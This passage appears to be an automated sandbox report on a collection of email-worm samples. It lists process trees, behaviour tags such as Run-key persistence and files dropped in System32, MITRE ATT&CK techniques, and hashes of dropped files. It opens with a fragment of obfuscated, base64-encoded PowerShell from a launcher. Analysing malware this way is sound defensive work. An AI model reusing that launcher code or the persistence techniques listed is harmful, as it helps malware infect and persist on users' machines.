QARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1888

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Browser Hijackers\BabylonToolbar.txt
1⤵
PID:4668

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\ZippedFiles.a.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\ZippedFiles.a.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4604

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Yarner.a.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Yarner.a.exe"
1⤵
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4756

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Xanax.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Xanax.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3928
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3928 -s 376
  2⤵
  - Program crash
  PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3928 -ip 3928
1⤵
PID:2448

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Winevar.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Winevar.exe"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1908
- C:\Windows\SysWOW64\WIN1CC8.pif
  "C:\Windows\system32\WIN1CC8.pif" ~~241114328
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:3192
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 2988
    3⤵
    - Program crash
    PID:3760

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\White.a.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\White.a.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3980

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Trood.a.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Trood.a.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3468

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Scare.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- System Location Discovery: System Language Discovery
PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:4748

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:3364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\San.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:3728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff864e446f8,0x7ff864e44708,0x7ff864e44718
  2⤵
  PID:3424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,9464647142703579128,5940118161967668799,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,9464647142703579128,5940118161967668799,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,9464647142703579128,5940118161967668799,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
  2⤵
  PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,9464647142703579128,5940118161967668799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,9464647142703579128,5940118161967668799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:4876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:4212

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:164

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3740

C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Quamo.exe
"C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Quamo.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1744

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2428

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Pleh.vbs"
1⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:3356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:4760

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:4336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:3144

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\NewLove.vbs"
1⤵
PID:2848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2564

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\ILOVEYOU.vbs"
1⤵
PID:1868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2444

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Email-Worm\Emin.js"
1⤵
PID:720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:3780

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Worm\HeadTail.vbs"
1⤵
PID:4620

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4164

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3865855 /state1:0x41c64e6d
1⤵
PID:812

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Phishing

T1566

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7zFM.exe

Filesize
3KB

MD5
55cde934290e89ae29f92ff118b6280c

SHA1
e13989a5ba4dba2cbc7c2a779b06f381266c32c7

SHA256
dc98a3995c8c9db2897b3dcd603d0a55e9d6b42cb3900f9b5666dbb461172197

SHA512
011822883aa21cd328582dadae90190b0d51040d6c7b05463584997a1c2f67e4c9655f2e80350e8c87c4d3c073ab0d80ff9bc6459d85f03e85ff1a6db9f28157

Download Submit
C:\Program Files\CopyMeasure.exe.Vbs

Filesize
33KB

MD5
70b924192a3c6e9f4634b2bc728692f2

SHA1
7353fc3cf7940cd9e1610726713b50a930a3eecf

SHA256
782b16b6dfa30a53c2946a4229cfae8736170d329b2661c44dbafa43b4479d0b

SHA512
d2c50402b3f92d9ce83bf248db7b45528b0a0b8f82730c3f2208c6c9d23ef3ce287bb839d62c38ca7217daa67e8908e77ace9ba5216dbbea0b284572926a3d1a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
800547b40b40a6d57a70b74809b450fa

SHA1
310a064c7ba82120f80af50892dcbe61b53f9d70

SHA256
a562ff4b14badc73b0804883bf4ccfd9972e485123de5e5949981794f66ed936

SHA512
39630e3b5069d0c66ea44069358cf01f180bf25103968f77d483a27deb7e91e796a1718ce9af2f438bebe8207537e735cd402d649e2adfa2ca7748faae2db949

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
40dec6834dce53e38f6998b5d86862ae

SHA1
d769dd72be10a5dcdb9b53fb5ab3d5a7f5023aa6

SHA256
c78b99aa82aac28d9daa06d92fd65912b18dd92d0fc93021105191c74eaeab4b

SHA512
e27e9aa67e5d818b7eff1218dffe4992ca834775aa25ab61e288defbe2469e5bb8743417215799115b2370dab029c3c31bccf8af15bf7f9ab1d061d76db0aa6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

Filesize
410KB

MD5
ddf5404462e891f68251344b44841b28

SHA1
a372a48e41e22316a0e57244b4b9aa5b80efa947

SHA256
5e585c2918f9a2680a85fa64adc32cf22ac409c4c86428ac45ad9f5a2e829ad9

SHA512
c5723167a19aa0f747e72dc238fd67c2576c42116831f2828b1635d94c7bd441cca4218b2e0a67ccc490b99a7c3acb15511d2b8ac483d7f940c2776f6118df91

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009

Filesize
72KB

MD5
db36ed4adbb35e8efb6002d8089d4ba3

SHA1
6dae18dca2d5ac496b56d22fbfead706bcb61846

SHA256
c4e0649557bb1bfd56490af82b3aedff62dc0fea7b043acacda150bf615a5b8f

SHA512
09d5eaa50811dec0c8ccfe8c60815c49c5d313c65fab682c77f018c33a2de4aa243d1435d48e420ff27991efd1a4acc3066e9b6d105dfc754876003969805ad8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

Filesize
109KB

MD5
0a07ec817c941ba513362c86977fe37e

SHA1
72486b4bc1ab7850a441a1c6e372c7b6540e819b

SHA256
965ccc642cf4658f0ef960d33d4a2f923bfcbd87ebd8d44cc109ad456111e193

SHA512
68aa5b58bd7c33840273f43b41585f26c724094a2898e8225443b542b41111f686d52989a6c82be79353234854ab8ff125cd948981b5d3332340b5104c3496e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000047

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

SHA256
e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

SHA512
37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00005d

Filesize
337KB

MD5
ca1953e1c380dcafe858cf610bcf6e7c

SHA1
88bb32ebe0664e3c191933d97da475030fd3d2b6

SHA256
dba475214ad94c9b8afd963835a7a5c709f03e28e148bd53d06519e8018d52c3

SHA512
2290a34a2552cec9743bd1cdf802ff08b670a96d02cec25aaee5844c29159abe8773b0d26b400c727fede7e53e254212c4eb0bbcd8c7e0126eb448811bbffd63

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00005f

Filesize
20KB

MD5
844b35b52c5959f8bb26060dc32c391c

SHA1
1f48b029f8627106a8da34bb050a0ac6ba67649d

SHA256
a6d94814e21ec2102241bbae2506c3134b94a084157134100a171f0884cd0b49

SHA512
42055ac770400e1622180f2e9e40bcd502f21960b05f1e52f0d672e0d230b2c6540f50afe8dd63786d148c432aa70f96d1261987361fa05197165330131e6ef4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
3KB

MD5
fe5ad99ca6a547e11cb006b01d3e4d31

SHA1
9e4d9cfba43d724a88ec12bc14178bddd21e487b

SHA256
11f02fd44365ab8337300391f42bda8b354c97d51721ab956b6ddf3795b2800d

SHA512
a67ea979f2e55a9a1d5ab40d19d120bd75871320d7d7cea151081bacee0368f2cb6686502d7d7829e17a809a1b31d9bf678d96f7526f6ddc741bd2e6d7ac7c40

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
c794b4c25d460d46fdbc30979544d865

SHA1
51c7bd8da0d8f8b49f28753707d3759cc43a5d6d

SHA256
b714776bb38b18b8f9cde978a459f9d80c3e8eec6393aa5e6c88f397f7d285d3

SHA512
58d4317b506a1c71a0ccc94410030f4b96e073e13abd04ebe3cf02c1c25a8607c921f5b0a5ded496d3073b4b09d968715341c04a5f2fc75176fda7a06e6270b9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
71d5680045ed5ca558ab834c755920a7

SHA1
cc2024c393868ed413b3c3412cbd7ec2d6c77976

SHA256
1cd2f5b948a0a19a9c16ecafa238995cd3a4f2def15b21b6332471c02f867515

SHA512
9ca4d04ba08696211958ea18b94b575dd2b958b53bbbe0718f0be517b10a8fe91ac101f3f8a0bfa5685b7cdbddcb760081d9e02402408447ebb3fb0e379f221f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

Filesize
264KB

MD5
a7fd5296011db4cfcbceb69b8b3212e6

SHA1
012bec389924571b7ce74dc99c2a06eb339f42d1

SHA256
52361ab7563d6d98b24c50b843d85bc11cf00b733a4eaf352d65a83c8077aabc

SHA512
7e61ca4c5a97c5604f7bc1168b8f1992344aa63c8bb3d91fb6e5a699fa0c77240d4bba4c41a60679978bb260e0419b496c595b2dbaabc2d9cc57450de2f77b48

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_theminecrftapk.com_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\1d59546e-e75f-41b4-8bbc-31eadc7548fd.tmp

Filesize
3KB

MD5
658fc760e4e4d391595bfef92f258969

SHA1
e56ce9f212feac9d3c6a7746641f3e7e0537c593

SHA256
914de8b4de29fbbceb716526e197f52cd53cf85d2c4105c3661f181519f92ff6

SHA512
44d7ca83ade047168e15c88d04cb029079ed90ce99b7061c5c84feacfecb5ece1692f608a5859e0175abcfd5ca8e74ab6934ec9c485bd6643d29f05841791905

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
20KB

MD5
a6bb032d962fce48e2715030bad90dd3

SHA1
82d98cca974f236401c2dce2b034f25f729d256d

SHA256
693e59fef6200297c03bda5dff2ac046f589486e5f06162d87090ae9b3f0a183

SHA512
a2b44f14294d8e35f6a2e665cf165bed908d06e8648a7ef116a7f487e13e786e38ec6477fdadf0b434f44cf2ffeaa4c1a4eccf87de9a8ceaa0d7bb77a95ecc22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
35KB

MD5
d525929fc31c9eccf96662909cb894da

SHA1
4d12df8fb7657295939ea915159f6dd2efc887f4

SHA256
7eeb5cebdc27bacf18aa908909626b30ae39a092e7309124312bf6dfa7806973

SHA512
9a479fe0d4ddb32f171ebe1346ce0b8d7b4dc36612d7c72b0d0103eea6ae07420c4e575efbe36c7aa6ff7c68fdb589192d0fd9487b0297b0a585bc08fd210887

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
fd1dc848ea61e3f3744f8f620ec62eed

SHA1
97409e3ea9008b90c873dd0d168a89bb30713c21

SHA256
35aaa8fbd89f29d3bd89ac22d11b7c7b25d36e5b45994a90d3d3c07c864a315a

SHA512
19d9a3d25b6f2164c6871451ec74c15da6c112b3a1de56418314c3eba90cc106396706b5f4f34cea2ad0277b617454e7b600c8c800b59e674d52d8a9b0d82afd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
37KB

MD5
48719c93cef7804dd0b098297a8b4a06

SHA1
9eb8e0cfc84649447b532a39e3e6db57f5827c49

SHA256
daf1b6617b13e00aef06248d2299074c06e71ee4b0108bda5f8e53bb068dbe16

SHA512
484b104370d1310de02a081aaeefa30b2e560a0d32b4addf83932221aec2829292046a309ddd088f0fab02785d75902ee8639b7022878d2703905e85406fcc6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
39KB

MD5
045bc4b6d046f2577c84be48d6ee6226

SHA1
92ca1e2b96b477e8c552744ce28fa5b9f2b8f6af

SHA256
cab00ad3fb44889e51c27093df90e364f05efa5800e4fa0ae4ac12b3e8716e1b

SHA512
64248c7a02c9b202328440e5dd07f80d7e3b72481dd678adc81c9fd40f3d397659f170a33d1e9aff601b36aab6e931fdd953cb0129af4d9222de3070041aad99

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
c0c3c88fc794f3c1e2b35efa728b95b4

SHA1
6eedeafcdf915e4affac6bb0a10abdaf2ea95370

SHA256
710321c6a570d1654f69a0917bcdcd213a73a3b0ae69acbfa40b1c10522fb7a8

SHA512
ebc1ccc637253dcd3b230590003ac1e2c53b5933f6f9d475c2fb78106349e5ce7a0af75106b014fcbf403772d0a2f7d885cc4b2b8e3ed47de4ae3e85db089174

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
ce0065751dd7e18d7d13226d7a372a1f

SHA1
3c3728092874c2f358012684e33ec11d18904522

SHA256
22bb6e03be9cdb22b9ba091477abf63dc1329ab94ddedc21e2aba2bd7d421770

SHA512
369a2ba9003cd428b4a356f3f928c685ec59f2b2e9d9730189196e09266766a8f9d84b77e3767114e5b16f830a6ccf71cd3fc53139b71e3a32b4c955b2fae233

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
bd2d148df44d4591c8d45ad71137d144

SHA1
7c8bd789ed8b584408ac28687855ac73ca452fea

SHA256
7e2eac22d6ca460055ac75503793406dbb9666d8157fc4517f69afa6066d1996

SHA512
84599aa6d9b29d22dc23bc0e8faee1e75682d60d54dbc4b9ca6b2afe00699b8e6e41681cd3266e950382f47649f9fdcb20b1845a4c3c199aa71bc1d2b7f8f8e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
690B

MD5
bcb9babaa1723f7c517bd515b6602a4b

SHA1
cf26afe61585107ec66739393d9356942a057696

SHA256
b1c7fd78cc79663d0cad73985c00356a13aa58b005e77c305b7e1c9c9dce227e

SHA512
bb022de365d1b0c109fc7374c5ce758fc274c629e5d11a3883c8f02d42e939fa22059dbb9cabb74620751b124192f7aa01d2955577af1330309b0151f8aa06d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
708de3d9948f45d1dbcf68a3654cadaf

SHA1
1c68439b0d3db867a473d862df5c36c1a13d9177

SHA256
fa6b90bf4e7e1a5e4fa42a4df6cfe189e5c9e9eddf320a8cb53f099843cdaab4

SHA512
5598497375b439fabb6807229ae5bc1802c40ad2e599b113b7848d656150b30a6ebda38f9dd559af9f6738bae4fadb408ad43f35c05350bd93d5eed7acab2f0e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
07feedd89fc7f449d6bbd337c9e51684

SHA1
af244e0d53082763f75fc4ee15785e8ba16c403f

SHA256
af5d0a66bbdf65d5de0e005b97f1bcba83acbc4916afb623e272631c3e2672c3

SHA512
7b0ca040d0475ef699a109140f97d1550b6becaff56bdc013ff41b8d196ae0df61c26592e6aab2ace457ec3b0faec526ae63c3f5423e2462e9618d6e62923164

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
8e3667eacb53c20575eb5839be43dd3a

SHA1
3cd6f2c2cdcbf7e6f8b6f97a3841b5976cffa231

SHA256
84bf1905cef042a2f8ffc083a99ecbfb07f41f6015d4343592c5ac38f3af72c5

SHA512
28b0f6d54b2a7d0278726a78ee1bd52e5d0762ef2287ae1e10bfcd78c1aa672e058df83e2fd98d26e52a880828870bf74a1d3f82a97afff6bde370deb4347574

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
16bf1b85079842704b08e6b36016ce2e

SHA1
238bf0cc55825ace39f6ce46b0e58e60fc453b55

SHA256
23180aeb63069ca56b004bcb35b1347c1aac262fc42f0c91e7a51767aafc361c

SHA512
bb3365fe6f0dda934fd9c16a413a3ee91d17b365d25e32be25ed1b149fd48114cf0b7b2b4d615f52d3d66b4579a1d9dc6daf14c8df8d1f799d44815f87306588

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
e8314b95d0f02daffb478137a04179cb

SHA1
3f850b9263c9f8a25bf768380d1cbbe7ef282957

SHA256
dccb9045f1dcfcb99b31cde1a69214c7b3db36d656673c4302f2bb26a132f75f

SHA512
9187a9454bc8dc79fc5917461bd2bb4ff77e9d152db308e92643d41904dd0f0a0efeaabc84830aae921f709e3a589cf06bc15060a304d3acd22d6b8c61c7e750

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
9a2e7acc694ce034a4298f4843b4a8b8

SHA1
28f1ad19a6df170b8e83d152ae064714b7f7932f

SHA256
